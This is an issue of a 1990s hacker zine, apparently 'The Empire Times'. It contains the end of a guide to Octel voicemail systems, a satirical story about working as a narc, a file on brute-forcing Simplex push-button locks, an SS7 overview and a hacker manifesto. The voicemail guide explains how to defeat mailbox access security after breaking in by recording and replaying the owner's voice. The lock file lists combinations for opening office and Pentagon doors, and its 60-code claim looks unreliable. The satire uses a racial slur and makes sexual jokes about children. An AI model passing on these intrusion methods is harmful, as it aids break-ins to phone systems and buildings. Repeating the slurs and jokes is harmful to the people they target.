1: Replay your message.
*: Re-record your message if you are not satisfied with it.
When re-recording you can re-record the whole message or just part
of it. Use the Recording controls which will be listed later on
in the text. (NOTE If you are leaving a long message the system
notify you with two beeps that tell you your time is almost up.)
Once you have finished recording your message you have the choice of
re-recording the message or delivering it. There are several ways of
selecting a destination. 1) box number. 2) subscribers name. 3) group
or personal distrubution list. 4) a guest or home mailbox number. (NOTE
Later on in the text we will discuss how to create distribution lists and
guest and home mailboxes.) When you are going to give the name of the
person, instead of the mailbox number, here is the format for entering in
the name -- last, first.
0=0
1=1
2=2,a,b, or c
3=3,d,e, or f
4=4,g,h, or i
5=5,j,k, or l
6=6,m,n, or o
7=7,p,q,r, or s
8=8,t,u, or v
9=9,w,x,y, or z
For instance, I was on the same system as you, you could send it to
PiMP,Telco = 746783526
You can mark the messages as either urgentor private. After you enter the
destination and before you send the message is when you can mark the message.
You can always cancel the the option by pressing the option number a second
time.
1: Private.
2: Urgent.
If you select message conformation you will presented with two choices.
conformation of receipt and notification of non-receipt. Conformation of
receipt is a system generated message which is sent to you after the person
has read your message. Notification of non-receipt is a system generated
message that tells you that the subscriber has not listened to your message
within a certain time frame.
1: Conformation of receipt.
2: Notification of non-receipt.
If you wanted to you could give the system a certain time to deliver the
message. This function is known as Future Delivery.
4: Future delivery.
After selecting this option you will be prompted to enter a date. You can
either enter the actual date or if the message is to be delivered within the
week you can specify the day of the week.
1: Specify the date.
-Select the month. Jan.= 1 and Sept.= 9.
-Select the date. Between 1 and 31.
-Set the hour and minutes. 7:00 = 700 and 12:30 = 1230.
-Select 1 for a.m. or 2 for p.m.
2: Specify the day of the week.
-Enter the first two letter of the day, using the chart above that
was used to enter in the name of the person on the system.
Sun.= 78 and Fri.= 37.
-Select the hour and minutes using the same format above.
-Select the time of day, a.m. or p.m., using the format above.
After selecting all of the options and getting everything squared away, you
are now ready to send the message. Press # to do this. After this enter *
to go back to the main menu.
Recording controls
------------------
Recording controls are basically identical to playback
controls used while listening to messages. There are only
a few commands that are different.
5: Resume the recording of a message.
1: Edit message.
11: Listen to what has been recorded.
2: Pause. Then press 5 to re-record over the undesired part
of the message.
#3. Check Receipt
-----------------
After you have entered this section from the main menu by pressing 3 you
will be asked the identify the subscriber's mailbox number or enter in their
name. All this option does is tell you whether or not the person you sent
mail to has listened to your mail or not. If they have not listened to your
mail all the way you will not get the receipt. The system will playback
every message the subscriber has not listened to. To skip the messages you
can press # or press * to cancel the Check Receipt.
#4. Personal Options
--------------------
Under this section in the main menu there are 6 options you can choose from.
1) Notification On/Off. 2) Administrative options. 3) Greetings. 4)
Notification schedule. 5) Mailbox forwarding. & 6)Security Options. (g00d13)
There are many levels of menus to this part of the main menu. But don't
worry Jane Octel will talk you throught all of the steps...:)
1: Notification On/Off.
This option basically sets whether system messages are repeated or
not. 1 = On, 2 = Off.
2: Administrative options. (Under this level you have many many choices)
1: Passwords.
1: Personal Password.
Your personal password can be up to 15 digits long. Your
sysadmin set what is the minimum length required. Do not forget
your password because then the sysadmin is forced to kill that
mailbox and start you up a new one. The sysadmin will not be a
happy camper. But then again sysadmins can eat a dick right?
2: Home Password.
This is just some password you can give to members in your
family. This just lets them send and receive mail like a guest.
3&4: Guest Password.
This is one of the coolest options of all. This is basically
a mailbox within a mailbox. You designate a password to one of
your friends and he can leave messages to you and you can leave
messages to him. But other users on the system cannot send the
guest mail.
5: Security Password.
This allows someone the option of getting the envelope
information for the messages in your mailbox.
2: Group Lists (NOTE You can have a maximum of 15 lists with a maximum
of 25 mailboxes).
1: Create list.
-Give a two digit number for the list you want to create(from
11 to 25).
-Record the name for the list like "Uhh cool asswipes".
-Enter either the mailbox number or the name of the people you
want on the list.
-To review all the names on the list press 1.
-To exit and save the list press *.
When you want to send a message to a distribution list, enter in the list
number when you are prompted to enter in the destination after recording the
message etc.
2: Edit existing lists.
3: Delete existing lists.
4: Review or rename lists.
3: Prompt levels.
These are the message prompts. It is like setting up menus on
a bbs. You can choose novice, skilled, expert. This is not
unlike setting up menus to your liking.
1: Standard prompts.
These prompts are your basic prompts wich go over basic options
such as sending mail etc.
2: Extended prompts.
This prompt gives thorough explanations of commands and prompts
you for use of all features.
3: Rapid prompts.
This prompts cover all features but do not give thorough details
and explanations.
4: Date and Time playback.
This option tells you the time the message was recieved. You
can turn this on by hitting 1 for on or 2 for off.
3: Greetings.
1: Personal greeting.
This is the greeting you get once you have called up the front
door or you have been transfered to that vmb. It is basically
the same for almost all vmbs. You enter in a message like "Uhh
this is Da TelcoPiMP, leave a fucking message after the beep!!"
You can also choose a standard greeting wich is the Jane Octel
voice saying that so and so is not in right now.
2: Extended absence greeting.
This greeting just says that you are out for a lengthy period
of time and won't be checking messages frequently. If the
Message block option is on when the extended absence greeting
is on your mailbox will not except messages except for messages
from the sysadmin.
3: Name recording.
This is a recording of your name which is used to confirm
mailboxes when someone has entered in the number of your mailbox.
It is also used with the standard greeting.
4: Notification schedule.
This function allows your mailbox to call you at certain times (the
times you setup) give you messages.
-Select 1 for first schedule 2 for second schedule or 3 for temporary
schedule.
-Enter the telephone you want the system to call you at.
-You will be asked to set up a start/stop time for the outcall
notification from your mailbox. You can specify whether it applys
to weekdays, weekends or both. Enter in the time using the same
format as the earlier commands that require you to enter in the
time.
-Select the type of message that activates the notification. 1 = All,
2 = Urgent and 3 = Group List.
-Select how soon you want the system to call you after it receives a
new message. 1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 =
immediately and 6 = Never.
-After all of this hassle you can confirm your entries or listen
again. 1 = Confirm and 2 = Listen again.
5: Mailbox forwarding. (NOTE To have this option work you must have
another mailbox created by the sysadmin, for the forwarded messages.
Call up the system where the mailbox has been created for you and set it
up.)
1: Establish or change the forwarding destination.
Enter the network node address? and the forwarding destination
mailbox number.
2: Cancel mailbox forwarding.
#: Confirmation.
6: Security options. (huhuhuhuh k00l)
1: Turn on access sekurity. (Record your name and the time.)
2: Turn off access sekurity.
Ok alittle inpho on this option. Once access security is on you are asked
to record your name and time. This is so that the next time you login to
your vmb you will hear "The last mailbox access was by <your name> at <time
of entry>." So the next time you login to the vmb you will hear that message
if you recorded the inpho at the begining of the last login. If you didn't
record any inpho you will hear silence. Ok say you break into a system and
this option is on. You will have to record that inpho. But the thing is you
don't know if the person recorded inpho the last time they accessed their vmb.
Therefore you are screwed. AHAH. Solution. Login. Record the inpho. Then
you will hear whether or not they recorded any inpho last time they were on.
Grab your cool crystal clear sounding tape recorder and record their inpho
as they give it. And then login to the vmb again but this time playback the
recording. It may work it may not. It all depends on the user of the system.
Conclusion:
-----------
This phile gives you most of the inphormation you need to mess with an OCTEL
VMB once you are inside. I didn't give any elite inpho like how to dialout or
anything you have to find that out yourself. Also you can dial through an
attendant. This system can be used to set up 800 meetme's (so can Meridian)
etc. This system is just as good as Meridian Mail maybe even better oh well.
Some cool inpho.
Octel Communications Corporations
890 Tasman Drive
Milpitas, California USA 95035-7439
(408)/321-2000
greets:
-------
armitage: this shit g0es to y00r d0m3.
dr. freeze: y0y0y0y0 Dr. Fr33z3 in da hauz.
manowar: uh Hello this is Black Menstraul and I'd like the #5ESS dialups for
my area so I can take over Bell Atlantic.
chaos: gimmie root on your system d00d.
r0ach: ypsnarf them passwords.
every_other_mother_fucka_i_didn't_mention: shouts go out to all yall mofo's.
L8R
Shadowdancer Da TelcoPimp
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 5 of 8
My Life as a Narc...
by Noelle
Introduction
It all started one bright sunny May morning. May 30th, 1993, to
be exact.
There I was, sitting at my computer terminal innocently playing
TrekMuse and TinyTim Mush. Little did I know how much trouble I was about
to get into.
I saw something in the reflection of my X-terminal, so I turned
around. Standing behind me was a Fed! My heart stopped for a moment, then
began to pound furiously. "Hello?"
The man was tall, about 6', with dark brown hair and piercing blue
eyes. "Agent Snorkel, Air Force OSI. Can I speak with you for a few
moments?" I noticed his reflective sunglasses and long black trench coat,
and had memories of something written by Tom Clancy.
"Uh..." I looked around for my boss, "Sure. I guess." My boss was
probably off reading another one of his molecular biology textbooks.
We walked out to the center courtyard of the Pentagon. It was a
windy day, so Agent Snorkel had to keep brushing his hair out of his eyes.
We sat down on one of the benches and he pulled out his badge. "We're
required by law to show you this." Before I could even read the name on the
gold blob, he shoved it back inside his pocket. Opening up his dayplanner,
he proceeded to ask me several questions about the internet and cyberspacial
adventures.
I responded with enthusiasm. "MUSH programming is a great way to
learn C code!" He looked at me with an expression that said, "C code?" and
I knew I was safe. "Yes, I learn so much more about how to do my job by
playing these games. If only EVERYONE had this opportunity!" Agent Snorkel
nodded and made a few chicken scratches on a pad of paper.
My mistake was in giving the guy too much information. I could see
a glimmer in his eyes when I said, "Oh yeah...these guys would do anything
to impress a girl on the net. They've told me about all SORTS of things
they've done which are probably against the law. Hacking into a computer is
illegal, isn't it?"
And so began my illustrious career as a narc.
Part 1
Not everyone is lucky enough to be considered worthy of posing as a
hacker. And certainly not many females! However, lieing is a skill I've
honed since childhood, when I used to do all sorts of things I wasn't
supposed to, and came up with a new and believable story on the spur of the
moment every single time!
I'm sure my appearance had something to do with it. Who wouldn't
believe that a 21-year-old girl with blonde hair and green eyes was a hacker?
Especially one who had a top secret security clearance in the Pentagon. I
tell you, those hackers were not easily fooled! It was tough to resist the
urge to show up at the 2600 meetings in DC wearing my glasses and sweatpants,
smoking and guzzling beer, setting a styrofoam cup or two on fire. Yet
somehow, I found the inner strength required to act completely normal in the
presence of these fashion gurus and trend setters.
That's another thing, speaking of urges that were hard to resist. I
was having fantasies about all of them. It was all I could do not to rip off
my clothing and throw myself on the first 12-year-old who came within ten
feet of me. Instead, I had to pretend that I was attracted to the older
hackers - what a drag!
Oh yeah, and the .gif's. I had to pretend that the papers I carried
around with me had something to do with coding, or UNIX, when actually all
they were, were listings of my pornographic .gif collection. It was quite
a treat to have hidden cameras ALL OVER MY APARTMENT, if you catch my drift.
To this day, I keep those photos in a secret safe behind my couch. I'm
waiting to release them when I'll be able to get top dollar. I've been told
that the photo of Okinawa with the horse will bring a particularly high
price, but that's just between you and me.
Part 2
So you're probably wondering what exactly those slimy Feds wanted?
Well, I'm gonna tell you that part now.
First off, we monitored IRC around the clock. You guessed it!
Nothing quite surpasses a Sunday night with a pot of coffee and a few
gigabytes of meaningful chatter. It's no wonder that students today spend
so much time on IRC; it's such a learning experience. You can learn about
anything, from anatomy, to what's the latest in your local hardware store,
and maybe even the current jeopardy score if you're REALLY paying attention.
And the strong friendships that come about as a result of IRC, let's not
forget those. Nothing beats a friend who cares about you so much that he
makes a couple thousand copies of your email to send to his closest friends.
Secondly, we dissected each and every usenet post on groups like
alt.2600. We were surprised to find a secret code in each and every message!
Some would even spell out satanic messages when you printed them backwards.
Try it, you'll see what I mean. Incredible stuff. We kept an updated
listing of who posted the most and on what topic, and of course the hot list
helped. Anyone who posted something including words like "bomb", "missile",
"assassinate", or "federal" was immediately placed under surveillance. We
sure know how to get the most out of the taxpayer's dollar!
We also taped all the 2600 meetings. It was a heck of a lot of fun
to squeeze ourselves into the potted plants. No spandex for us, oh no! We
made sure that we dressed in ceremonial robes of ambassadors so we wouldn't
stand out. You know how observant those hackers are! We have all sorts
of incriminating evidence on tape, from people actually talking to C-Curve
(oh, I thought you knew that was against the law), to Dr. Freeze wrapping
anyone within arms reach in a bear hug. The worst was when some kids tried
to give away boxes of chocolate chip cookies. Those boys are gonna do some
HARD TIME for that, I tell you.
Part 3
Now, onto the part that people always ask about. Who's going to
jail?
Let me first profile Supernigger. This guy is quite a piece of work.
So confident! So...pale?
His main mistake was having a fit of anger and deciding to cut off
my phone line when there were Fed-types in my apartment. Boy did they love
to hear me scream at him when he called to explain what had happened!
What we have on him is a tape of him stealing a pack of bubble gum
from the 7-11 by his house. It was pure detective work setting it up, right
down to the little camera hidden in the earring of the cashier. We could
tell he didn't suspect anything. And why would he? He's never been in
trouble before, so he has no reason to be paranoi
d!
Then there's KL. Yes, the guy who's on the cover of that hacker
book, the one who's got something pulled over most of his face. That's to
hide the mark he had on his chin from being hit with the dart of a nerf gun.
Some weird story, something that happened to him at UUNET. We never did
manage to get all the details, even though we had KL tied to a chair for
two days. He's pretty good under those million kilowatt bulbs!
Anyways, we caught KL using a scanner to listen in on the phone
conversations of his neighbors. Yep, he was planning on blackmailing his
neighbors and using the money to pay off his legal bills. We caught him
red-handed though, and he's agreed to help us out in the future...if you
know what I mean...you never know when we might need him to help us spy
on our bosses or the local FBI office.
Not to be forgotten is that John guy. This was a little harder
because this is a man who would NEVER break the law. He even puts ME to
shame! But, being brilliantly trained investigators, we soon discovered the
meaning behind his handle, "Laughing Gas".
Mr. Lgas' claim to fame is being the local hitman for the DC crowd.
Yep, whenever someone can't get their revenge through hacking or phreaking,
they go to John. John's most famous elimination procedure is shattering
someone's head with the front of his car. His bumpers must be made of STEEL
or something! Luckily, we only witnessed ten or eleven *SPLATS* before we
cuffed him and brought him in to be tortured...err, questioned. He responded
to our questions with peals of laughter, so we had him committed. The latest
news from the institution is that he keeps asking for internet access. Sad.
Last but not least is the man we all know and love, the Wing. Did
anyone ever figure out his handle? Nope, we don't know. The way we figure
it is if you subtract his age from the year of his birth, then multiply that
by 666, and add that to the sum of his name in hexadecimal, it will give
you the IP address to a super top secret military base. We're still checking
on that, because it may have something to do with UFO's. A young man by the
name of Chris Goggans helped us with that little tidbit of information. What
a helpful young man, always trying to do what's right and NEVER thinking only
of himself!
At any rate, the last I heard, the Wing is planning on giving
interviews and writing a couple books about the trial that never was.
Because, come to think of it, we don't have anything on him. But it sure
makes a good story to make people think we do! Anything to keep the IRC
hackers talking, and talking, and talking (dang, you'd think by now they'd
have forgotten who I was, but NO! to this day, my name appears at least a
million times in all of our IRC logs...I guess there's nothing else to talk
about, now that every operating system on the internet is secure).
That's all for now folks.
THE END
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 6 of 8
How to Hack Simplex Locks
by erudite
Simplex Locks.
Complete Listing & Hacking Theory
Simple(x) Description:
A Simplex lock is one of those door locks with the 5 push buttons
and a 3 digit code. There are a lot of these type locks in the
pentagon, (not high access, but for a little added security) and,
in many many office buildings..
Okay, Simplex locks are very easy to hack, now think that you can
not use the same # twice in a row, since it's already pushed in,
and you can't have the same # twice in one code, because the # is
already registered. So that would leave 5 options for the first
selection, 4 for the 2nd selection, (you can't do 2 in a row) and
3 left for your last selection (since you can't use 2 of the same
# in a combo) so that is 5X4X3 which is = to 60. I needed to hack
a few of these simplex locks and I couldnt find a file that tells
how to actually "hack" it if you dont know the code. Since I had
to do it myself and couldnt find it anywhere, I thought I'd write
about it. So what you basically do is either memorize the pattern
and then start to manually hack it, or if you arnt a thinker, you
can get a mini-cassette recorder & record your voice saying them
one by one, manually enter them as you play the tape back and you
wont miss a combination. (This method is not as time consuming as
you think if you can enter them fast.)
I hope you can benifit from this text file, Simplex locks are fun
erudite
Here are all 60 combinations:
123 213 312 412 512
124 214 314 413 513
125 215 315 415 514
132 231 321 421 521
134 234 324 423 523
135 235 325 425 524
142 241 341 431 531
143 243 342 432 532
145 245 345 435 534
152 251 351 451 541
153 253 352 452 542
154 254 354 453 543
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 7 of 8
SS7 and caller ID and stuff like that.
by grendal
I keep reading things that talk about caller ID and ANI and SS7. EXCEPT
that pieces of the puzzle are always missing. I decided to try clear these
up a little:
SS7 is really a complex packet network that links AT&T UNIX processors
(the ones that run AT&T toll offices and Bell Operating company central
offices) with a series of other UNIX routing processors called STPs (Signal
Transfer Points) and SCPs (service control points). STP's are really I/O and
communications processors while SCP's are high speed database servers for the
STPs. The SCPs are responsible for synchronizing information about numbering
plans, switching offices, call setups and routing (paths) and call accounting.
Each SS7 end point (telephone switch) has a unique PC or Point Code so routing
is easy.
SS7 is a CCITT specification and the messages used by it as well as the
structure of the network are public information. AT&T started SS7 in 1976
when it was known as CCIS or "common channel interoffice signalling". Today
AT&T, MCI and Sprint all use SS7, but many LECs (local exchange carriers)
don't participate. Most likely this is because they would have to convert
their switching equipment which would cost big bucks which they would rather
spend on executive salaries.
In the "good ol days", each switch that received a call had to choose
a path through the office either to a line or to a trunk to another office.
It had to receive and send call digits and call progress signals. Since SS7,
the UNIX machines that control the individual physical AT&T toll offices are
NO LONGER IN CONTROL OF SELECTING THE CALL PATH THROUGH THE OFFICE! Hence
the major crashes that happen when the system goes down because one node goes
down or a bug hits them all. The SS7 packet network is currently being
converted to T1 (1.544mb/s) connections, but lots of it is still running on
56kb/s links - digital private lines that are hooked up between the UNIX
processors.
This network is a system of "links";
"A" links connect telephone switches or data bases to STP processors.
"B" links connect STP pairs in different areas of the country or regions.
"C" links connect mated STP pairs (STP's are duplicated to prevent failures).
"D" links interconnect different SS7 networks such as AT&T's and MCI's.
"E" links connect a telephone switch to an STP in a different region.
"F" links connect telephone switches to other telephone switches.
(this is called associated signalling)
Since LECs and IXC's are greedy and since extortion is their business,
they don't cooperate very well and LEC SS7 networks only talk to IXC
(interexchange carrier) networks like AT&T, MCI and Sprint 'cause the law says
they have to. ANI (automatic number identification) over SS7 only goes
forward from the LEC to the IXC when a call leaves a LATA. The IXC doesn't
deliver it to the distant end LEC.
The IXCs are therefore the only ones who can provide nation (or world)
wide calling party ID and then only if your equipment (PBX) is connected
directly to their networks. This is why caller ID is anly available within
LEC areas and even then it may not be able to cross two switching offices
since the LEC's don't often build "F" links among their own switching systems'
computers.
This is often because the software releases of the switching controllers
aren't SS7 compatible. For example, 1ESS needs generic 1AE10, 5ESS needs
5E4.2 and DMS100 (the most popular Northern Tel switch) needs BCS25. The
message routing STPs are most often AT&T 2ASTP's, DSC DEX Megahub (MCI) and
NTI SuperNodes. Of course the software on each of these systems is unfriendly
to the others....
All of this leaves a whole world of UNIX computers out there for us to
play with. The more the merrier.... In the future, I'll try to find some
database structure information about the STPs and SCPs and if anyone wants
more detail, leave a note on Digital Anarchy.
The BAD part about it all is that there is no longer much room for
"anonymous" telephone calls. The Telco's and the Federales can see almost
all of your connections and identify both you and the other end. If they can
do that, obviously they can also listen to your data and your voice. This is
why we need to work really hard on systems like encryption and tempnets or
pseudopacket nets to keep our privacy and anonymity.
Leave some notes and let me know what (besides the obvious shit like
accounts and numbers and id's and passwords) you need to know. I'll try and
cover it and keep these short and useful, maybe with a 2 week interval. The
next issue will look at AUDIX - the most common voice mailbox system used for
AT&T's PBX's.
later,
grendal
==============================================================================
-=- The Empire Times -=-
Volume 2, Issue 4, File 8 of 8
Don't tell me our name,
by erudite
Have you ever wondered why? Have you ever wondered how? I bet you
wished you had, or tried. I do, I think, I wonder, I explore, I live to see
the day you come forth to me and ask me for advice. While now you turn your
nose up at the sight of my name, our name..
You take me as a man in black, but I won't let that stop me from
stating my point. You fear me, you loth me at the site of my name, our name..
If you could take me as a individual, or a person you would respect
me, when you know my will is good. When you know I'll advance the world...
There again goes another lifeless kid playing on the computer, who
will one day make good money, no spouse, no where.. "He sits there and tries
to figu
re out how the machine works, he's probably just wasting he's time."
Maybe, maybe.. That's me, I want to know how it works, I want to know how
I can get into it. "Damn Hacker, all he wants to do is put a virus or
something in there, wreck the computer, damn kid, he has no fear."
Did you know the difference? I still to this day have yet to meet a
true hacker who's intentions are malicious, since one who is, is not a hacker.
I won't let you try to kill my thought processes to try to tell me
I'm a threat to this world, when infact you who doesn't think is the real
threat. Can you imagine a world without hackers now, a whole world with no
guidelines, going nowhere..
So tell me I lie, tell me I cheat. Make your excuses to explain your
mistakes. Society's mistakes, Society's whisper...
Change our name, and think not what society's thrown upon us, and
what we are.. You know they say "If you teach the what to think, they will
b0ecome the slave of knowledge, If you teach the how to think, knowledge will
become their slave." Think things up not how you are imposed on, what you've
heard.. Think things up from what you've found, what you've discovered, and
you'll look upon us in a without the mask.
Never again shall you look about me as if I'm the suspect, as if I'm
I'm the felon. Open your mind, and soak in the knowledge like a sponge
submerged into the ocean. You hate my erudition, but that is fine by me.
I've gone through my share of hardships, oh yes but I won't let that stop me
from stating my point..
==============================================================================
The Empire Times Q & A Section.
Where can I get The Empire Times?
[NPA] [#] [System Name] [System Operator]
----- ------------- ------------------- -----------------
(301) 384-2482 Empire Albatross
(703) PRIVATE Digital Anarchy Armitage
(+49) XXXXXXXXX Secret Techtonics Sevenup
Via Anonymous FTP
etext.archive.umich.edu /pub/Zines/Emptimes
Where can I send my Article Submissions?
You can mail Armitage or Albatross on either Digital Anarchy or
Empire. You can also mail them to me personally at armitage@dhp.com.
What kind of Files do we publish?
We publish anything dealing with tellecommunications and or unix
security (or lack thereof). Or anything interesting and or informative.
Can I become a member board?
Well, probably not. If you wish to distribute Empire Times you may
as long as the file is distributed in it's full entirety.
There are no "Empire Times Distribution Sites", the three listed
above, are those are run by Armitage, Albatross, and Sevenup and just
tell where you can get the Empire Times. You see, obviously you can
get the Empire Times on Empire BBS and Armitage's BBS.. etc..
